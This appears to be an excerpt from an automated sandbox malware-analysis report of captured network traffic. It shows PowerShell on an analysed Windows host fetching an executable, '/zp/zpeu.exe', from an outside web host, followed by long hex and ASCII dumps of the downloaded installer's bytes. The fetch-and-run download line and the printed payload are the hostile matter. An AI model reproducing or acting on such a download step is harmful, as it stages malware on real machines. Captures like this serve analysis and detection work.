                                                      Data Ascii: .68]/Parent 127 0 R/Resources<</ExtGState<</GS0 146 0 R>>/Font<</C2_0 151 0 R/C2_1 153 0 R/C2_2 158 0 R/TT0 161 0 R/TT1 164 0 R>>/ProcSet[/PDF/Text/ImageC]/XObject<</Im0 141 0 R/Im1 142 0 R>>>>/Rotate 0/StructParents 0/Tabs/S/Type/Page>>endob
                                                      Jun 1, 2023 12:14:26.959634066 CEST445INData Raw: 4e 5a c8 f5 22 96 52 50 da 90 e3 bb 5d 72 b5 4b ed e2 2e 62 75 a8 57 bc e4 52 97 2f 95 20 b9 12 9a e4 a2 e4 5a 44 2e 5d c4 e6 e4 fe ab af 36 4f 1f 7f b1 f9 76 77 fd 3f 32 96 97 ff 92 bf b7 17 5f 6e 9e fe 20 05 7f bc 79 7d fb e6 ea e6 ad 64 ff fa
                                                      Data Ascii: NZ"RP]rK.buWR/ ZD.]6Ovw?2_n y}dHzf/|{^>QnVA)kA|o^_?_7/y?_wrfw'jvo>~w_n^_8kxO_$
                                                      Jun 1, 2023 12:14:26.959661961 CEST446INData Raw: 98 e3 7b 45 e8 55 49 51 58 fe 21 85 28 f5 64 55 9a b0 b2 d1 be 7e 23 ea 37 64 15 f9 de 22 b1 af 23 ad fb dc 2a 26 42 fb db 8e fb 8b be ce fd 1c 7d 3c d1 3f f6 43 da c5 7b a8 83 b3 30 cf 9c 2c 1a 13 16 40 16 22 b8 7a 6f 76 b3 28 64 9f 9a 22 37 41
                                                      Data Ascii: {EUIQX!(dU~#7d"#*&B}<?C{0,@"zov(d"7Ai{fXeN>]}|%CZl1qKIj"uP1r|(4[T|8qM101Kc`9ZW}`b5ETkD A+>6wKo
                                                      Jun 1, 2023 12:14:26.959693909 CEST447INData Raw: 7c ea fb a7 ae 63 4d 96 38 12 15 26 db 47 d3 ec 40 86 39 f4 44 82 13 f9 54 aa c4 0a c1 84 d6 8e d2 39 3c 53 0b 8e 89 c0 b2 07 ff 96 52 dd a9 44 75 1c bc 05 ba ce a9 f4 e0 d7 2b 93 77 d4 63 30 df c2 1d 90 28 00 7f 24 61 2e 7a 41 bf 41 19 8c 85 7d
                                                      Data Ascii: |cM8&G@9DT9<SRDu+wc0($a.zAA}4I=hJ(z6m}FL~dIu,`hF:Wc$gh8OO>UjGA=03^mh!)f#i%^N*CjK6&w*%d
                                                      Jun 1, 2023 12:14:26.959722996 CEST448INData Raw: 46 98 0c 20 2f 3d cf e6 0f 88 3e 8c cb 1e 86 8c d9 4a 8d 08 71 4f f9 03 1d 16 9d 8d 7b eb 48 79 1c 7b 62 99 ba bb ff ec 63 e9 14 50 af 1a 88 cf a9 da 8c a4 71 1b 89 89 d2 8a d7 7d f8 b1 34 c2 18 08 f2 58 e4 cf 2a 76 2b 00 d7 39 e8 f4 39 a8 f4 d9
                                                      Data Ascii: F /=>JqO{Hy{bcPq}4X*v+99Q,3*on bby( &)9l,"/Gf9Awfx8w3l}@/9`LJvU*42TH3t2uPP'E`tayk~14[{a:Od
                                                      Jun 1, 2023 12:14:26.959752083 CEST450INData Raw: d9 5a 26 e9 5a ea 5b 9f f2 54 d5 b3 20 79 d4 e9 64 02 42 9f 26 0d 68 2f 64 e1 20 b4 0c 48 27 e6 57 63 00 22 a1 1b 3a 31 b0 90 fa a2 8b e6 4b 9c e6 39 4f 83 f1 d0 0a b4 85 e8 ea ab f6 cf 0b 2b f7 d5 fc d2 35 a1 1f b2 a1 ca 04 86 a0 30 73 a9 db 94
                                                      Data Ascii: Z&Z[T ydB&h/d H'Wc":1K9O+50sxjhA|c~OM',/bnB_ D0qNR8\UE9E^}zAox>;1lc/E##,wMrqRb{57/O#|?Nx#:"Qsxm
                                                      Jun 1, 2023 12:14:26.959781885 CEST451INData Raw: 5d e4 44 49 b2 f5 43 4f 45 41 72 34 26 17 0d 58 75 b2 dd c7 56 1d 5b 44 b8 02 4a 7c b0 16 20 19 22 04 11 df b2 be ae ae 5b 93 de c0 7f 80 09 74 0c 7f 0e d0 c4 e5 02 3e 13 ea 28 a1 31 b6 b3 84 16 e4 e8 ad 04 9a 98 23 4a 85 c1 1e f4 2e 59 09 ac 45
                                                      Data Ascii: ]DICOEAr4&XuV[DJ| "[t>(1#J.YEl>$GZ!8.=8d+JK(iR1CHRyS1_05YNwkOr1LgRp(AHB]9TJM"U"~qT
                                                      Jun 1, 2023 12:14:26.959813118 CEST453INData Raw: 2e b7 ae c8 00 8f c8 4a f9 1b b3 0d 5f 51 55 7b 22 91 da ad cc 51 18 1a 61 63 c7 17 36 0a df 9d 9d 2d 58 29 a8 26 76 cc 2b 9c 47 0c a1 05 ae 06 0a 03 82 c4 00 db 85 db 30 12 b1 27 0d c0 db 07 ab 04 85 d0 1e 84 a4 f7 84 c7 70 6c 05 e0 75 01 6d 82
                                                      Data Ascii: .J_QU{"Qac6-X)&v+G0'plum.XURY%\.CgxS2'3" Qd2LrC8_#:bhn5,,d00~c=y<6'??-X2+qat+L@l8=I'iwy<q
                                                      Jun 1, 2023 12:14:26.959841013 CEST454INData Raw: 2d 58 8b 25 d3 a6 94 33 1e cb cc 41 8f 42 03 92 f1 13 4c a5 09 8c 5c b6 21 5c 04 b0 16 47 f4 04 ef 02 f7 13 35 fe 0a f8 a7 84 6b ee f6 1c 81 72 68 12 a7 0a 2a 13 ad fb 5d d4 e6 48 f8 40 07 9a 0d 30 36 e0 2b 3b 33 11 7f 49 63 38 e1 e5 0d 70 f3 c2
                                                      Data Ascii: -X%3ABL\!\G5krh*]H@06+;3Ic8p!V X(hFFP6gC5W#6j@NP$RXYa9BWy>@-6NVtZ180 sjzxS4t<F2a:Z$M5&
                                                      Jun 1, 2023 12:14:27.127692938 CEST455INData Raw: 37 57 fe 55 1b 38 c8 06 71 4b e0 39 24 1b 0c 40 52 49 1f 15 9a 3a e7 24 23 aa 11 e0 e6 00 13 e3 b3 63 3f d0 ab 1b 0e fb 01 8e b3 32 b6 55 67 17 c6 5e c0 54 16 1a 54 b3 6e 77 ec 01 80 8c 9b a7 cd 94 4e d4 aa 70 ec d1 e6 d8 5b dc 47 a8 07 3d b9 d9
                                                      Data Ascii: 7WU8qK9$@RI:$#c?2Ug^TTnwNp[G=~YOyb7fE+5IT$0D_%AJu'>q/nNLa!0q#@w4aSDA"/|KF8lJL


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.54971784.16.234.51443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2023-06-01 10:14:23 UTC0OUTGET /zp/zpeu.exe HTTP/1.1
                                                      Host: www.dld.ae
                                                      Connection: Keep-Alive
                                                      2023-06-01 10:14:23 UTC0INHTTP/1.1 200 OK
                                                      Date: Thu, 01 Jun 2023 10:14:23 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Thu, 01 Jun 2023 09:47:42 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 344681
                                                      Content-Type: application/x-msdownload
                                                      2023-06-01 10:14:23 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 27 95 75 59 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 2a 02 00 00 08 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPEL'uYd*
                                                      2023-06-01 10:14:23 UTC8INData Raw: 40 00 7b 16 40 00 cc 16 40 00 35 17 40 00 5c 17 40 00 6f 17 40 00 0c 19 40 00 0f 19 40 00 41 19 40 00 56 19 40 00 68 19 40 00 ff 19 40 00 30 1a 40 00 72 1a 40 00 b0 1a 40 00 4d 1b 40 00 71 1b 40 00 19 1c 40 00 19 1c 40 00 ed 1c 40 00 0e 1d 40 00 33 1d 40 00 57 1d 40 00 b3 1d 40 00 43 1e 40 00 77 1e 40 00 00 1f 40 00 52 1f 40 00 86 1f 40 00 2b 20 40 00 fe 20 40 00 53 22 40 00 d7 22 40 00 06 23 40 00 48 23 40 00 88 23 40 00 de 23 40 00 7e 24 40 00 f2 24 40 00 5c 25 40 00 70 25 40 00 92 25 40 00 44 26 40 00 e7 27 40 00 1b 28 40 00 35 28 40 00 62 28 40 00 a7 28 40 00 a2 29 40 00 2f 2a 40 00 bf 2a 40 00 bf 2a 40 00 9a 2a 40 00 92 25 40 00 44 26 40 00 dc 1a 40 00 e0 1a 40 00 e4 1a 40 00 e9 1a 40 00 f6 1a 40 00 fa 1a 40 00 fe 1a 40 00 02 1b 40 00 0b 1b 40 00 15
                                                      Data Ascii: @{@@5@\@o@@@A@V@h@@0@r@@M@q@@@@@3@W@@C@w@@R@@+ @ @S"@"@#@H#@#@#@~$@$@\%@p%@%@D&@'@(@5(@b(@(@)@/*@*@*@*@%@D&@@@@@@@@@@
                                                      2023-06-01 10:14:23 UTC15INData Raw: 0e 6a 07 e8 bc c9 ff ff 85 c0 75 03 40 eb 02 33 c0 50 6a 00 68 65 04 00 00 ff 75 08 ff d6 33 c0 5e 5d c2 10 00 55 8b ec 81 ec 80 00 00 00 8b 45 14 53 56 8b 75 10 57 6a dc 85 c0 5b 74 0b 0f ac c6 14 c1 e8 14 33 ff eb 4e 6a 14 81 fe 00 00 10 00 59 8b c6 73 06 6a 0a 59 6a dd 5b 81 fe 00 04 00 00 73 05 6a de 33 c9 5b 81 fe 33 33 ff ff 73 0d 33 c0 6a 14 40 5f d3 e0 99 f7 ff 03 c6 8b f0 25 ff ff ff 00 6a 0a 33 d2 8d 04 80 03 c0 d3 e8 d3 ee 59 f7 f1 8b fa 8d 45 c0 6a df 50 e8 85 17 00 00 50 8d 45 80 53 50 e8 7a 17 00 00 50 57 56 68 a0 a3 40 00 ff 75 0c be e8 36 42 00 56 e8 64 17 00 00 56 8b f8 e8 50 17 00 00 8d 04 47 50 ff 15 90 82 40 00 83 c4 18 56 ff 75 08 ff 35 d8 91 42 00 e8 5e 0d 00 00 5f 5e 5b c9 c2 10 00 8b 44 24 0c 33 c9 51 50 ff 74 24 10 ff 74 24 10 e8
                                                      Data Ascii: ju@3Pjheu3^]UESVuWj[t3NjYsjYj[sj3[33s3j@_%j3YEjPPESPzPWVh@u6BVdVPGP@Vu5B^_^[D$3QPt$t$
                                                      2023-06-01 10:14:23 UTC23INData Raw: 00 00 89 45 a8 7d 05 89 55 c8 eb 10 83 7d c8 0a 7d 06 83 6d c8 03 eb 04 83 6d c8 06 39 55 cc 74 1c 8b 45 ec 2b 45 d4 3b 45 8c 72 03 03 45 8c 8b 4d f8 33 db 43 8a 04 08 88 45 a5 eb 68 33 db 43 e9 cd 01 00 00 8b 45 fc 8b 4d c8 c7 45 cc 01 00 00 00 c7 85 7c ff ff ff 07 00 00 00 8d b4 48 80 01 00 00 e9 d3 05 00 00 83 7d 94 00 0f 84 67 07 00 00 8b 4d 90 8b 45 f4 c1 65 f0 08 0f b6 09 ff 4d 94 c1 e0 08 0b c1 ff 45 90 89 45 f4 8b 45 c0 39 45 b8 0f 85 ad 00 00 00 81 fb 00 01 00 00 0f 8d 05 01 00 00 0f b6 45 a5 d0 65 a5 8b 4d a8 c1 e8 07 89 45 b8 40 c1 e0 08 03 c3 8d 34 41 8b 4d f0 c1 e9 0b 66 8b 06 89 75 ac 0f b7 d0 0f af ca 39 4d f4 73 1a 83 65 c0 00 89 4d f0 b9 00 08 00 00 2b ca c1 f9 05 03 c8 03 db 66 89 0e eb 1d 29 4d f0 29 4d f4 66 8b c8 c7 45 c0 01 00 00 00
                                                      Data Ascii: E}U}}mm9UtE+E;ErEM3CEh3CEME|H}gMEeMEEE9EEeME@4AMfu9MseM+f)M)MfE
                                                      2023-06-01 10:14:23 UTC31INData Raw: 00 69 00 6e 00 63 00 6f 00 6d 00 70 00 6c 00 65 00 74 00 65 00 20 00 64 00 6f 00 77 00 6e 00 6c 00 6f 00 61 00 64 00 20 00 61 00 6e 00 64 00 20 00 64 00 61 00 6d 00 61 00 67 00 65 00 64 00 20 00 6d 00 65 00 64 00 69 00 61 00 2e 00 20 00 43 00 6f 00 6e 00 74 00 61 00 63 00 74 00 20 00 74 00 68 00 65 00 0a 00 69 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 65 00 72 00 27 00 73 00 20 00 61 00 75 00 74 00 68 00 6f 00 72 00 20 00 74 00 6f 00 20 00 6f 00 62 00 74 00 61 00 69 00 6e 00 20 00 61 00 20 00 6e 00 65 00 77 00 20 00 63 00 6f 00 70 00 79 00 2e 00 0a 00 0a 00 4d 00 6f 00 72 00 65 00 20 00 69 00 6e 00 66 00 6f 00 72 00 6d 00 61 00 74 00 69 00 6f 00 6e 00 20 00 61 00 74 00 3a 00 0a 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 6e 00 73 00 69 00 73 00 2e 00 73 00
                                                      Data Ascii: incomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.s
                                                      2023-06-01 10:14:23 UTC39INData Raw: 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03
                                                      Data Ascii:
                                                      2023-06-01 10:14:23 UTC47INData Raw: ff 8e 52 09 ff 93 59 12 ff 9b 63 1d ff a1 6a 25 ff 9e 69 26 ff 88 54 12 ff 60 31 00 ff 49 26 02 c5 09 09 09 36 03 03 03 17 01 01 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 02 02 11 04 06 09 2f 47 29 05 94 9c 5d 0f ff b8 76 24 ff c9 81 29 ff ce 85 29 ff d2 86 28 ff d1 82 23 ff cf 81 20 ff d1 82 20 ff d3 83 1f ff d5 83 1f ff d5 84 1f ff d8 86 1f ff db 87 1e ff dd 89 22 ff e3 9d 46 ff e5 a0 4c ff e6 a0 4b ff e7 9d 43 ff e1 8c 20 ff c7 86 20 ff b2 8f 39 ff b2 91 3d ff b0 90 3b ff af 90 3b ff b1 92 3b ff b2 93 3b ff b3 94 3c ff b3 94 3a ff b2 94 3a ff b1 94 3b ff b1 91 32 ff af 85 1a ff b1 92 32 ff af 8b 22 ff af 87 18 ff b2 94 30 ff b0 8c 1d ff b6 8a 29 ff b9 8b 3c ff b5 89 2c ff af 8a 16 ff b0 8c
                                                      Data Ascii: RYcj%i&T`1I&6/G)]v$))(# "FLKC 9=;;;;<::;22"0)<,
                                                      2023-06-01 10:14:23 UTC54INData Raw: ff 08 73 0f ff 06 71 0d ff 05 70 0c ff 02 6d 0a ff 02 6e 09 ff 01 6f 0a ff 00 70 08 ff 00 6d 05 ff 03 70 0a ff 0e 73 0e ff 18 74 17 ff 27 7c 27 ff 3a 7b 3c ff 77 95 79 ff a1 a5 a2 ff b8 b2 b8 ff b4 b6 b4 ff ac b2 a9 ff a9 a9 99 ff a0 93 71 ff 91 90 74 ff 5d 8a 5d ff 3b 7c 3f ff 0a 6b 0d ff 02 71 0a ff 08 73 11 ff 09 71 10 ff 07 6f 0e ff 08 70 0f ff 09 73 10 ff 0a 70 10 ff 0b 72 10 ff 0b 70 0f ff 18 70 0f ff 2a 6e 0f ff 4f 68 0d ff 98 5e 0b ff a1 58 0a ff 9d 57 0a ff 99 56 09 ff 96 53 09 ff 91 51 09 ff 8d 4e 09 ff 89 4c 08 ff 85 4a 08 ff 81 48 08 ff 81 4a 0d ff 88 54 18 ff 90 5d 23 ff 92 61 29 ff 86 56 1f ff 63 35 04 ff 54 24 00 f9 1c 12 07 59 01 02 03 12 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: sqpmnopmpst'|':{<wyqt]];|?kqsqopsprpp*nOh^XWVSQNLJHJT]#a)Vc5T$Y
                                                      2023-06-01 10:14:23 UTC62INData Raw: ff b6 79 35 ff b5 79 33 ff b5 77 32 ff b4 77 31 ff b4 77 31 ff b5 78 31 ff b6 77 31 ff b7 77 31 ff b6 77 31 ff b1 70 29 ff b9 93 6a ff d4 d9 e0 ff c2 c7 c8 ff 98 a5 9a ff a4 98 a4 ff ce c8 cf ff b9 ad bb ff a0 a4 a1 ff 90 89 8f ff a0 78 9a ff 93 71 8f ff 7d 7d 7e ff 8a 5d 7f ff 75 73 76 ff 7e 75 7f ff a6 a6 ab ff c1 c6 c9 ff be c2 c6 ff be c2 c6 ff be c2 c6 ff c1 c5 ca ff a7 ae b2 ff 8b 6f 44 ff 98 72 3c ff 98 73 3e ff 9a 74 3f ff 89 6d 3c ff 2d 52 31 ff 0e 42 28 ff 32 52 3b ff 6f 6c 6f ff 6e 6c 6e ff 6b 6c 6e ff 6f 65 56 ff 81 61 36 ff 73 68 50 ff 6f 6c 5f ff 6b 66 58 ff 6c 6a 61 ff 6d 6b 61 ff 6c 69 60 ff 68 64 5a ff 66 5e 4f ff 67 66 5b ff 60 53 3a ff 6a 51 2f ff 5a 4f 39 ff 97 a4 ad ff c3 c6 ca ff be c2 c6 ff be c2 c6 ff be c2 c6 ff be c2 c6 ff bd c1
                                                      Data Ascii: y5y3w2w1w1x1w1w1w1p)jxq}}~]usv~uoDr<s>t?m<-R1B(2R;olonlnklnoeVa6shPol_kfXljamkali`hdZf^Ogf[`S:jQ/ZO9
                                                      2023-06-01 10:14:23 UTC70INData Raw: ff 33 2a 23 ff 34 22 15 ff 37 24 16 ff 3a 26 16 ff 39 25 15 ff 3a 25 15 ff 66 38 16 ff 71 3c 16 ff 6c 3a 14 ff 6a 3a 15 ff 74 44 20 ff 7e 51 2f ff 85 58 37 ff 7a 50 2e ff 4e 24 0a ff 2f 0f 01 df 0b 07 04 2b 00 00 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 01 02 03 11 32 19 06 9f 89 53 29 ff ac 72 46 ff ad 74 46 ff ad 73 44 ff aa 6d 3f ff a8 6b 3a ff a8 6a 3a ff a7 68 39 ff a8 69 39 ff a8 69 39 ff a8 69 39 ff a7 66 34 ff b5 8d 6f ff cb d2 d7 ff cd d0 d4 ff bc c9 bf ff ac 8c a6 ff 9e 6f
                                                      Data Ascii: 3*#4"7$:&9%:%f8q<l:j:tD ~Q/X7zP.N$/+2S)rFtFsDm?k:j:h9i9i9i9f4oo
                                                      2023-06-01 10:14:23 UTC78INData Raw: ff aa ad b1 ff d7 dc e0 ff d6 da dc ff b6 c2 cc ff 08 1c 7c ff 00 02 75 ff 43 87 6b ff 43 8a 6f ff 46 8f 6a ff 34 69 6e ff 00 00 72 ff 1a 36 84 ff c4 ce d3 ff d5 d8 db ff d4 d8 dc ff ca cd d2 ff 3a 3a 3c ff 27 27 27 ff 2c 2c 2c ff 2b 2b 2b ff 2d 2d 2d ff 29 29 29 ff 2d 2d 2d ff 28 27 27 ff 2e 2e 2f ff c0 c5 c9 ff d5 d9 dd ff d6 d9 dc ff b7 c5 ce ff 0b 21 7f ff 00 00 6f ff 3b 5d 9c ff 56 88 a8 ff 45 77 96 ff 2b 46 93 ff 00 00 6d ff 1b 34 8b ff ca d2 d7 ff d4 d8 db ff d6 db df ff b4 b8 bb ff 24 24 24 ff 21 21 21 ff 23 23 23 ff 20 20 20 ff 21 21 21 ff 21 21 21 ff 21 21 21 ff 1e 1e 1e ff 40 40 40 e1 5c 5c 5c b1 58 58 58 b3 58 58 58 b3 5c 5c 5c b3 5f 5f 5f b3 69 69 69 b2 8d 8d 8d df b1 b0 b1 ff b4 b4 b4 ff 96 96 96 ff 52 52 52 db 05 05 05 13 00 00 00 00 00 00
                                                      Data Ascii: |uCkCoFj4inr6::<''',,,+++---)))---(''../!o;]VEw+Fm4$$$!!!### !!!!!!!!!@@@\\\XXXXXX\\\___iiiRRR
                                                      2023-06-01 10:14:23 UTC86INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:23 UTC94INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:23 UTC101INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:23 UTC109INData Raw: ff 8e 90 75 ff 8f 94 7d ff 80 8c 71 ff 65 7c 53 ff 63 7d 52 ff 47 75 33 ff 32 71 20 ff 33 6e 1b ff 37 6e 19 ff 3a 6f 1a ff 36 6e 16 ff 35 6e 14 ff 3c 6f 17 ff 3a 6f 12 ff 3b 70 0e ff 3e 71 0c ff 44 74 0d ff 4a 74 0d ff 52 76 0f ff 56 76 10 ff 5c 74 10 ff 64 76 10 ff 6e 76 0f ff 78 75 0f ff 83 76 0f ff 8e 75 0e ff 9a 74 0d ff a8 73 0d ff b5 74 0d ff c0 73 0b ff c9 72 0b ff cc 72 0b ff ca 70 0a ff c6 70 0a ff c1 6d 0a ff bc 6b 0a ff b7 67 0a ff b1 64 09 ff ac 61 09 ff a6 5e 09 ff a0 5a 09 ff 9a 57 09 ff 94 53 08 ff 8d 50 08 ff 88 4d 07 ff 8a 52 0f ff 95 5f 1f ff 99 65 28 ff 84 52 17 ff 62 30 00 ff 26 16 06 71 01 02 04 11 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 03 0e 20 14 06 5c 93 58
                                                      Data Ascii: u}qe|Sc}RGu32q 3n7n:o6n5n<o:o;p>qDtJtRvVv\tdvnvxuvutstsrrppmkgda^ZWSPMR_e(Rb0&q \X
                                                      2023-06-01 10:14:23 UTC117INData Raw: ff b8 87 b0 ff ac 86 a4 ff a8 6b 9b ff 93 91 94 ff 85 7e 85 ff 79 79 7a ff 8c 86 8e ff 71 67 71 ff 95 94 98 ff cb d0 d3 ff c8 cc d0 ff c8 cc d0 ff c9 cf d4 ff 9b 96 86 ff 96 70 38 ff 9b 77 42 ff ad 8e 63 ff 9f 83 5b ff 7e 65 44 ff 61 71 49 ff 42 63 43 ff 2b 29 2b ff 6c 55 36 ff 90 7b 5c ff 8e 86 7a ff 79 74 73 ff 7f 76 76 ff 8e 82 79 ff 9b 89 72 ff 73 6a 66 ff 54 49 3c ff 69 52 30 ff 8a 90 8e ff cb cf d4 ff c8 cc d0 ff cc cf d3 ff cd d0 d3 ff cc d0 d3 ff dc dd de ff b7 b5 b2 ff 82 7c 79 ff 66 63 67 ff 97 8b 7b ff b0 8d 5c ff c2 aa 85 ff d7 d8 da ff cb cf d3 ff cd d0 d4 ff cc d1 d6 ff ba b4 af ff 7c 48 1b ff 7a 41 0f ff 7b 42 11 ff 7c 42 11 ff 7c 43 12 ff 7a 43 12 ff 76 41 12 ff 73 40 11 ff 78 48 1b ff 86 56 2c ff 86 59 2f ff 61 35 11 ff 32 13 02 c1 06 05
                                                      Data Ascii: k~yyzqgqp8wBc[~eDaqIBcC+)+lU6{\zytsvvyrsjfTI<iR0|yfcg{\|HzA{B|B|CzCvAs@xHV,Y/a52
                                                      2023-06-01 10:14:23 UTC125INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 24 24 48 8a 8a 8a cd c7 c7 c7 ff d1 d1 d1 ff d3 d3 d3 ff d6 d7 d6 ff db db da ff e0 e0 e0 ff e5 e5 e5 ff e9 e9 e9 ff ef ef ee ff ee ee ee ff 8a 8a 8a ff 32 32 32 ff 2c 2c 2c ff 2a 2a 2a ff 29 29 29 ff 26 26 26 ff 26 26 26 ff 27 27 27 ff 28 28 28 ff 27 27 27 ff 22 22 22 ff 53 55 56 ff cc d0 d5 ff ce d2 d4 ff 68 76 a7 ff 21 3a 96 ff 86 b7 e3 ff 4d 7f a5 ff 7e ac d5 ff 1b 32 84 ff 61 73 9d ff cf d2 d4 ff ce d2 d8 ff 88 8a 8e ff 23 23 22 ff 2b 2b 2b ff 29 29 29 ff 2a 2a 2a ff 29 29 29 ff 23 23 23 ff 8d 90 92 ff ce d2 d7 ff c7 cd d1 ff 3a 4c 8f ff 55 59 9a ff b5 be c5 ff 51 83 a5 ff 68 90 c7 ff 0b 1c 7c ff 93 9f b8 ff ce d1 d4 ff c5 c9 ce ff 4a 4b 4c ff 1c 1c 1c ff 21 21 21 ff 21 21
                                                      Data Ascii: $$$H222,,,***)))&&&&&&'''((('''"""SUVhv!:M~2as##"+++)))***)))###:LUYQh|JKL!!!!!
